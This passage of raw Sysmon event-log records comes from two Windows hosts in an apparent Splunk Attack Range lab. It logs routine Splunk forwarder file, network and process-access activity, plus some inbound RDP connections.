Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D02EABDD5E2C4D1518563228F86B0C0A,SHA256=A0A40CA90F6AE43936F87A9B21F05A4FA6EB9395058F91277FB7953E944AB78F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049281Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:20.217{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55B3D941B76AC9128D784D5D0E964A25,SHA256=020FE1EDA03E15E7B942EB09C2DF566EB2465A800E54BD74CD78B2603AF730F2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977872Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:17.782{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59328-false10.0.1.12-8000- 354300x8000000000000000977871Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:16.749{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54991-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977874Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:21.747{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=373015E3B290822ADE84F0D6B4E7DE27,SHA256=A5694B1255F73194C512D0EA0257C508F0FF1E5C983D2D92C02D0311352F7BDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049282Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:21.232{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0E459F7F6681194D36133DF4D485414,SHA256=FF12C6486B0B7F31534B081CD31E84DA98E0B8207E1DDA3850703AFE2A0FA68E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977875Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:22.749{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=501CE3467A2399FCE0D0CDF4BCB12E55,SHA256=FC21070C0844A29CC7FF0818C4A062CC00BF96619464E9BE0D7AC782C008E88D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049283Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:22.246{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7544260AA4BA56B578EB37B0D6AEF426,SHA256=96F2883CC5FDDEF56F27C8ED2B9227578AFB3E595C1413E542A0967D5BDF2F0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977877Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:23.811{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3BCABC88F2BF13962E698106278286BF,SHA256=F9CEAFA53CE9201ED92ED72BB9C2CD1D4156CAF99581095B525EF33224F01511,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977876Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:23.764{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E295EB79A0476A85B19089C2BE481158,SHA256=C0E0F31213A5E4488B65EE2EECE4DA42F9A2DABDDE2B78CB8111C491DD371A0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049286Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:23.946{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=920C176E40E03134DE96A2FF5E88ADD9,SHA256=BF747496B18FDCB097BB572B969F1D23BA348F8938AE89E611483CF82C776539,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049285Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:23.946{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=17932961498EC2083CB479606AB2A414,SHA256=8DB1B35DF49721CE594314E17E9E33FFAA2412C5A05DC96AC425201975B432D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049284Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:23.246{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD425020F37CD12EC46CC5C331DC2DEA,SHA256=E649ADEAF15B569F568D0BCEEE7F2590AC2A883715B21617F664234C00EA1370,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977879Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:24.780{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BE213264E715F354C1974AEC20EADEE,SHA256=33E0F6BACF8BBF4CA4E4F889625531C0C705D2C6F53725746773C20CAEF1DB31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049289Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:24.623{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\respondent-20210924073323-4303MD5=3A908804D0573FF7380F514264884FB3,SHA256=C81D2F048F52EDBC4290754297EEBE81A82636336939823758E35E4C6AD1E005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049288Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:24.314{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B58466FA34F8ED6A8D5ADB1245E17EE6,SHA256=EAE9950745709CBEC1C2E4E89018B5D837C036583AEE8DF43512400509F9E068,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977878Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:20.876{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-64034-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x80000000000000001049287Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:21.847{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-63971-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x8000000000000000977893Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:25.905{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-89CD-6151-A479-00000000FD01}3628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977892Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:25.905{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977891Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:25.905{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977890Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:25.905{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977889Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:25.905{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977888Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:25.905{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977887Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:25.905{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977886Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:25.905{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977885Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:25.905{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977884Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:25.905{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977883Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:25.905{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-89CD-6151-A479-00000000FD01}3628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977882Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:25.905{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-89CD-6151-A479-00000000FD01}3628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977881Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:25.890{69CF5F33-89CD-6151-A479-00000000FD01}3628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000977880Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:25.796{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64AAFA7C2D8B30F07FCD544DB8F6BEC0,SHA256=044767269A8C28BDDB0F531D0EA16C8314A78FF4FB1753A1A2A96D2A8CDB455C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049292Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:25.614{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210924073320-4304MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049291Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:25.329{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55468DD1F57A29CCDE44F0191A766012,SHA256=1627365894E3001A1CCE05EB794311FB43AA36D8B7F11CF7CF1BD34E4D610A35,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049290Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:22.757{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53295-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049294Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:26.631{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=920C176E40E03134DE96A2FF5E88ADD9,SHA256=BF747496B18FDCB097BB572B969F1D23BA348F8938AE89E611483CF82C776539,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049293Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:26.329{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06A4A2F61ACA1CE688676140AFD6F241,SHA256=1FA868011343B22872EDA6BEF32F019CBEE52D9A9811C05292A1F74194E1C9D8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977909Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:26.749{69CF5F33-89CE-6151-A579-00000000FD01}24442908C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000977908Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:23.752{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59329-false10.0.1.12-8000- 10341000x8000000000000000977907Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:26.592{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-89CE-6151-A579-00000000FD01}2444C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977906Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 